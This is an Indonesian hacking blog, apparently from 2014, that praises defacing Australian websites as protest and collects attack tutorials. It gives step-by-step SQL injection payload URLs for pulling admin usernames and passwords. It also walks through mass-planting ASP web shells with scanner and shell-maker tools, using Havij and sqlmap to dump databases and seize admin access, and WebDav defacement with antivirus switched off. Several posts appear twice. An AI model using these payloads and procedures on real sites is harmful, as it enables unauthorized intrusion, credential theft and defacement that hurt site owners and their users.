Baru-baru ini banyak halaman website australia di hack oleh orang
indonesia, ini karena isu penyadapan data-data rahasia pemerintahan
indonesia oleh Badan intel australia. maka dari itu sebagai protes
banyak aksi para hacker melakukan hack terhadap website-website yang
berasal dari australia.
Hack website ?
Hack halaman website orang lain dalam dunia IT disebut Deface.
Cara melakukan deface ini banyak caranya, salah satunya dengan
menggunakan software asli buatan indonesia yang sudah mendunia lho..
yaitu menggunakan program webdav.
Video Tutorial Klik Disiini
Tampilkan postingan dengan label Website. Tampilkan semua postingan
Tampilkan postingan dengan label Website. Tampilkan semua postingan
Tutorial | Simple Blind SQL Injection Method
Kamis, 24 Juli 2014
Simple Blind SQL Injection Methode V4 Tutorial
Video Tutorial Klik : Simple Blind SQL Injection Methode
Langkah Pertama:
Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
===========
=step two=
===========
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–
chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
============
=step three=
============
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–
=============
=step four:=
=============
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
============
=step five=
============
find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
===============
=step six:=
===============
ok in the last step you must find admin page
ex : website.com/admin
Video Tutorial Klik : Simple Blind SQL Injection Methode
Langkah Pertama:
Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
===========
=step two=
===========
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–
chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
============
=step three=
============
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–
=============
=step four:=
=============
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
============
=step five=
============
find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
===============
=step six:=
===============
ok in the last step you must find admin page
ex : website.com/admin
Tutorial | XSS Attack
Rabu, 23 Juli 2014
Cross Site Scripting (XSS) adalah kerentanan yang ditemukan di
aplikasi web dan umumnya digunakan oleh hacker jahat untuk membajak
sebuah sesi pengguna yang sah dengan website. XSS disebabkan karena
validasi tidak tepat antara input user dengan server dan kemudian
mengirimkan input yang tidak valid ini kembali ke pengguna dalam
beberapa bentuk exploitasi. Sebuah sumber untuk melacak rentan XSS
terbaru software, website dan penelitian terbaru tentang XSS adalah
XSSed.com
Pada bagian ini, terdapat 4 seri video dari Arne Aachen Metode yang memberikan penjelasan rinci tentang XSS. Jika video tidak bisa di load, silakan langsung menuju ke TKP di youtube.
Video Tutorial Klik : XSS Attack Video Tutorial
Pada bagian ini, terdapat 4 seri video dari Arne Aachen Metode yang memberikan penjelasan rinci tentang XSS. Jika video tidak bisa di load, silakan langsung menuju ke TKP di youtube.
Video Tutorial Klik : XSS Attack Video Tutorial
Tutorial | Cara Deface ASP Website
Selasa, 22 Juli 2014
Trik sebenernya dah lama ane tau, tapi sempet lupa, untung tadi ada
temen ane yang tanya gimana caranya make tool nya om hmei7 yang
aspshellmaker, okelah… saia jelasin aja sekalian disini. pertama-tama
yang kita perlukan adalah mendowload alat perang berikut,,wkkwkwkwkw….
1. aspshellmaker
2. asp-scanner
3. shell asp
fungsi dari t-tool tadi adalah sebagai berikut…
asp shell maker
Tool ini berfungsi untuk otomatis menginjek web asp yang vulnerable. Cara kerjanya cukup mudah anda siapkan dulu web.txt berisi url web asp yang vuln, dan shell.asp yang sudah saya sertakan pada tool diatas. Tinggal buka aplikasi aspshellmaker terus klik Hajar, maka tool otomatis akan mengecek dan menginjekan shell anda ke web asp yang vuln.
asp-scanner
tool ini berguna untuk men-scan web asp yang vuln, anda tinggal pilih type scan nya asp sql injection dorknya juga anda bisa ubah-ubah sendiri lalu klik Scan, maka tool akan otomatis men-scan web-web asp yang vuln. setelah selesai melakukan scan hasil dari scan akan berada di indonesia.txt di dalam folder tool tersebut.
shell.asp
ini adalah aspshell yang berfungsi sebagai shell di web berbasis asp.
Langkah kerjanya…
1. Scan dulu pake asp-scanner
2. setelah selesai scan , hasil dr scan ( indonesia.txt) isinya di kopas pindahin ke web.txt
3. buka aplikasi aspshellmaker, kemudian klik hajar
4. cek hasil injekan dari tool aspshellmaker di berhasil.txt
1. aspshellmaker
2. asp-scanner
3. shell asp
fungsi dari t-tool tadi adalah sebagai berikut…
asp shell maker
Tool ini berfungsi untuk otomatis menginjek web asp yang vulnerable. Cara kerjanya cukup mudah anda siapkan dulu web.txt berisi url web asp yang vuln, dan shell.asp yang sudah saya sertakan pada tool diatas. Tinggal buka aplikasi aspshellmaker terus klik Hajar, maka tool otomatis akan mengecek dan menginjekan shell anda ke web asp yang vuln.
asp-scanner
tool ini berguna untuk men-scan web asp yang vuln, anda tinggal pilih type scan nya asp sql injection dorknya juga anda bisa ubah-ubah sendiri lalu klik Scan, maka tool akan otomatis men-scan web-web asp yang vuln. setelah selesai melakukan scan hasil dari scan akan berada di indonesia.txt di dalam folder tool tersebut.
shell.asp
ini adalah aspshell yang berfungsi sebagai shell di web berbasis asp.
Langkah kerjanya…
1. Scan dulu pake asp-scanner
2. setelah selesai scan , hasil dr scan ( indonesia.txt) isinya di kopas pindahin ke web.txt
3. buka aplikasi aspshellmaker, kemudian klik hajar
4. cek hasil injekan dari tool aspshellmaker di berhasil.txt
Tutorial | SQL Injection Menggunakan HAVIJ
Minggu, 20 Juli 2014
Dunia sekarang sungguh sangat dipermudah, tinggal jadi pemakai sudah
bisa langsung jago dalam hal SQL Injection, tanpa harus mengetahui
dasar-dasarnya. You can call your self what?
Oke lah, ini hanya sekedar sharing bagaimana caranya SQL Injection Havij:
1. Silakan cari target dengan menggunakan SQL Injection Vulnerability, bisa di cari dan didapat dari exploit-db.com, silakan ditemukan disini: http://adf.ly/qGdDJ , cari vulnerability yang memiliki keyword “SQL INJECTION“.
2. Kemudian silakan download HAVIJ TOOLS FREE Klik Disini
Langkah-langkah utama dalam Havij:
Oke lah, ini hanya sekedar sharing bagaimana caranya SQL Injection Havij:
1. Silakan cari target dengan menggunakan SQL Injection Vulnerability, bisa di cari dan didapat dari exploit-db.com, silakan ditemukan disini: http://adf.ly/qGdDJ , cari vulnerability yang memiliki keyword “SQL INJECTION“.
2. Kemudian silakan download HAVIJ TOOLS FREE Klik Disini
Langkah-langkah utama dalam Havij:
- Temukan website yang memiliki Vulnerable SQL Injection
- Masukkan target yang vulnerable tersebut ke tab “Target” di Havij tanpa tanda ‘
- Kemudian klik Analyze
- Menu-menu yang ada silakan dipelajari di HELP PDF & HELP CHM yang sudah di download untuk fungsi masing-masing.
- Anda bisa melakukan deface website dengan HAVIJ
- Anda bisa melakukan copy / save database dengan HAVIJ
- Anda bisa menemukan admin login dengan HAVIJ
- Anda bisa menjadi administrator website dengan HAVIJ
- Selanjutnya tergantung dari sejauh mana kelihaian anda dalam mengolah target
- Video Tutorial SQL Injection Havij
Tutorial | Pentest & Hacking Dengan SQLMAP
Selasa, 15 Juli 2014
Hacker GoBlog akan berbagi bagaimana melakukan penetration testing dengan menggunakan SQLMap (Tools SQL Injection & Takeover)
Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection
Lihat Video DI LINK BERIKUT : Video SQLMAP
Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection
Lihat Video DI LINK BERIKUT : Video SQLMAP
Tutorial | Cara Deface Website Dengan WebDav Shell Maker
Senin, 14 Juli 2014
Saya akan memberikan tutor dan link download WebDav… Berhubung
kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir
akan kerusakan website.. Karena hanya halaman index saja yang di
deface…
Download Files Berikut :
Web Dav
*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Namanya Juga Tools Untuk Hack kode program yang digunakan merupakan kode yang dilarang jadi akan dianggap sebagai virus oleh anti virus
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..
2. Pilih WebDav >> ASP Shell Maker
3. Terus Klik Add Site >> Masukkan Website Target
4. Tunggu Sampai Proses Selesai
5. Terus hasilnya copas pada address bar
Selanjutnya Terserah Anda :)
Download Files Berikut :
Web Dav
*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.
Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Namanya Juga Tools Untuk Hack kode program yang digunakan merupakan kode yang dilarang jadi akan dianggap sebagai virus oleh anti virus
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.
Nih ku kasih tutor dikit mengenai aplikasi ini :
1. Jalankan software nya..
2. Pilih WebDav >> ASP Shell Maker
3. Terus Klik Add Site >> Masukkan Website Target
4. Tunggu Sampai Proses Selesai
5. Terus hasilnya copas pada address bar
Selanjutnya Terserah Anda :)
Langganan:
Postingan (Atom)